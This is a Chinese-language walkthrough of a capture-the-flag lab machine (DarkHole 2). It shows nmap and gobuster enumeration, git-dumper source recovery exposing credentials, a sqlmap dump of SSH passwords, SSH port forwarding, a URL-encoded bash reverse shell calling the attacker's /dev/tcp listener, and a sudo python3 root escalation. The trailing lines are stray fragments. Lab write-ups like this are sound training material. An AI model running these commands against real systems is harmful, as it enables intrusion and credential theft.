kali:192.168.223.128
靶机:192.168.223.152
主机发现
nmap -sP 192.168.223.0/24
端口扫描
nmap -sV -p- -A 192.168.223.152
开启了22 80 端口
web
进入登录界面发现没有注册按钮了
扫一下目录
gobuster dir -u http://192.168.223.152 -x html,txt,php,bak,zip,git --wordlist=/usr/share/wordlists/dirb/common.txt
好像就.git文件比较可靠
用git_dumper.py 重构源码
git-dumper http://192.168.223.152/.git backup
git log
git diff a4d900a8d85e8938d3601f3cef113ee293028e10查找第二次提交不同的时候有邮箱密码
邮箱:lush@admin.com
密码:321
测试发现url中id=1可以sql注入
python sqlmap.py http://192.168.223.152/dashboard.php?id=1 --cookie="PHPSESSID=283nc54ubju86rl6it21i0m24g" --batch -D darkhole_2 -T ssh --dump可以跑出ssh密码
在losy目录下找到第一个flag
继续乱翻
看到opt下有个web目录
这个url可以执行命令,在80端口测试发现不可以使用,说明不是80端口的
在定时任务里面看到这是开在9999端口的服务,定时任务由losy权限执行
将9999端口转发到本地
ssh -L 9999:127.0.0.1:9999 jehad@192.168.1.105
确实可以rce,那么反弹shell应该就能拿到losy的shell
cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%20%200%3E%261'
看历史指令
有个密码是gang
用这个密码发现ssh可以连接losy
可以看到python由root权限
那么直接用/usr/bin/python3开启一个shell那么就能拿到root权限
sudo /usr/bin/python3 -c 'import os;os.system("/bin/bash")'
最后拿到flag
总结:
1.git泄露,git-dumper获取源代码
2.sql注入拿到ssh账号密码
3.端口转发到本地
4.历史指令泄露
5.python提权
)
)
)
结构解析)
,注意数据备份)
